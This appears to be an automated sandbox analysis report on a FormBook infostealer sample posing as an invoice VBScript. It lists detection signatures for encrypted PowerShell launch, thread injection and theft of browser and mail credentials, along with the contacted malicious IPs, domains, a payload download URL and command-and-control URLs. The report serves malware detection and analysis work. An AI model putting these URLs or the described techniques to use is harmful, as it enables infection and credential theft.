Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_08350420 CreateNamedPipeW, 13_2_08350420

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\chkdsk.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 623396 Sample: WWVN_INVOICE_8363567453.vbs Startdate: 10/05/2022 Architecture: WINDOWS Score: 100 59 www.thebeautystore.store 2->59 61 www.tandelawnmaintenance.com 2->61 63 15 other IPs or domains 2->63 73 Snort IDS alert for network traffic 2->73 75 Found malware configuration 2->75 77 Malicious sample detected (through community Yara rule) 2->77 79 10 other signatures 2->79 12 wscript.exe 2 2->12         started        signatures3 process4 signatures5 99 Wscript starts Powershell (via cmd or directly) 12->99 101 Very long command line found 12->101 103 Encrypted powershell cmdline option found 12->103 15 powershell.exe 25 12->15         started        process6 signatures7 107 Tries to detect Any.run 15->107 18 ieinstal.exe 6 15->18         started        22 csc.exe 3 15->22         started        25 conhost.exe 15->25         started        27 ieinstal.exe 15->27         started        process8 dnsIp9 65 barsam.com.au 203.170.86.89, 49759, 80 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 18->65 81 Modifies the context of a thread in another process (thread injection) 18->81 83 Tries to detect Any.run 18->83 85 Maps a DLL or memory area into another process 18->85 87 2 other signatures 18->87 29 explorer.exe 4 1 18->29 injected 55 C:\Users\user\AppData\Local\...\gkb1wfd4.dll, PE32 22->55 dropped 33 cvtres.exe 1 22->33         started        file10 signatures11 process12 dnsIp13 67 www.repaircilinic.com 185.53.179.171, 49781, 49782, 80 TEAMINTERNET-ASDE Germany 29->67 69 www.clickleaser.com 198.23.49.173, 49770, 49771, 80 STEADFASTUS United States 29->69 71 5 other IPs or domains 29->71 105 System process connects to network (likely due to code injection or exploit) 29->105 35 chkdsk.exe 1 18 29->35         started        39 ieinstal.exe 29->39         started        41 ieinstal.exe 29->41         started        signatures14 process15 file16 51 C:\Users\user\AppData\...\2LMlogrv.ini, data 35->51 dropped 53 C:\Users\user\AppData\...\2LMlogri.ini, data 35->53 dropped 89 Detected FormBook malware 35->89 91 Tries to steal Mail credentials (via file / registry access) 35->91 93 Tries to harvest and steal browser information (history, passwords, etc) 35->93 95 4 other signatures 35->95 43 cmd.exe 2 35->43         started        46 firefox.exe 1 35->46         started        signatures17 process18 file19 97 Tries to harvest and steal browser information (history, passwords, etc) 43->97 49 conhost.exe 43->49         started        57 C:\Users\user\AppData\...\2LMlogrf.ini, data 46->57 dropped signatures20 process21
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
68.65.122.211
 schnellekreditfinanz.com United States
22612 NAMECHEAP-NETUS true
217.160.0.18
 www.borneadomicile.com Germany
8560 ONEANDONE-ASBrauerstrasse48DE true
209.99.40.222
 www.linqxw.com United States
40034 CONFLUENCE-NETWORK-INCVG true
199.192.29.215
 www.getsuzamtir.xyz United States
22612 NAMECHEAP-NETUS true
198.23.49.173
 www.clickleaser.com United States
32748 STEADFASTUS true
180.76.247.231
 www.dujh.xyz China
38365 BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd true
185.53.179.171
 www.repaircilinic.com Germany
61969 TEAMINTERNET-ASDE true
203.170.86.89
 barsam.com.au Australia
38719 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU true

Contacted Domains

Name IP Active
www.dujh.xyz 180.76.247.231 true
www.borneadomicile.com 217.160.0.18 true
schnellekreditfinanz.com 68.65.122.211 true
www.repaircilinic.com 185.53.179.171 true
dual-a-0001.a-msedge.net 13.107.21.200 true
www.getsuzamtir.xyz 199.192.29.215 true
e-0009.e-msedge.net 13.107.5.88 true
barsam.com.au 203.170.86.89 true
www.linqxw.com 209.99.40.222 true
www.clickleaser.com 198.23.49.173 true
www.shantelleketodietofficial.site unknown unknown
www.schnellekreditfinanz.com unknown unknown
www.tandelawnmaintenance.com unknown unknown
www.revboxx.com unknown unknown
www.actu-infomail.com unknown unknown
www.thebeautystore.store unknown unknown
www.projectduckling.com unknown unknown
www.gpusforfun.com unknown unknown
www.liesdevocalist.store unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.repaircilinic.com/wn19/?AVnXAh=rBunXcp5a8HG2eTY65iWvy6khmWv9on3XutAN+/kdojtSOLKRRt/04yNs8WYDZYu6HpH&Vb3pDf=BHT0MRp true
  • Avira URL Cloud: safe
 unknown
http://www.borneadomicile.com/wn19/?AVnXAh=A9tPw5wW+2gVzhiAst2uEYMxl8Qbhtbs4UZqv+cXLFe4/YHx2PgN7R7cqpKWqQ64E5aF&Vb3pDf=BHT0MRp true
  • Avira URL Cloud: safe
 unknown
http://www.repaircilinic.com/wn19/ true
  • Avira URL Cloud: safe
 unknown
http://barsam.com.au/bin_FCWtLoO90.bin true
  • Avira URL Cloud: safe
 unknown
http://www.schnellekreditfinanz.com/wn19/ true
  • Avira URL Cloud: safe
 unknown
www.shantelleketodietofficial.site/wn19/ true
  • Avira URL Cloud: safe
 low
http://www.linqxw.com/wn19/ true
  • Avira URL Cloud: safe
 unknown
http://www.getsuzamtir.xyz/wn19/ true
  • Avira URL Cloud: safe
 unknown
http://www.clickleaser.com/wn19/?AVnXAh=q67zoIOMf4+mO4D8EIqIf3d7IvOeBQOSx5x5Cm6B2nNhbRkYSectWIWbwYJ7UqoIixMy&Vb3pDf=BHT0MRp true
  • Avira URL Cloud: safe
 unknown
http://www.clickleaser.com/wn19/ true
  • Avira URL Cloud: safe
 unknown
http://www.schnellekreditfinanz.com/wn19/?AVnXAh=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&Vb3pDf=BHT0MRp true
  • Avira URL Cloud: safe
 unknown
http://www.borneadomicile.com/wn19/ true
  • Avira URL Cloud: safe
 unknown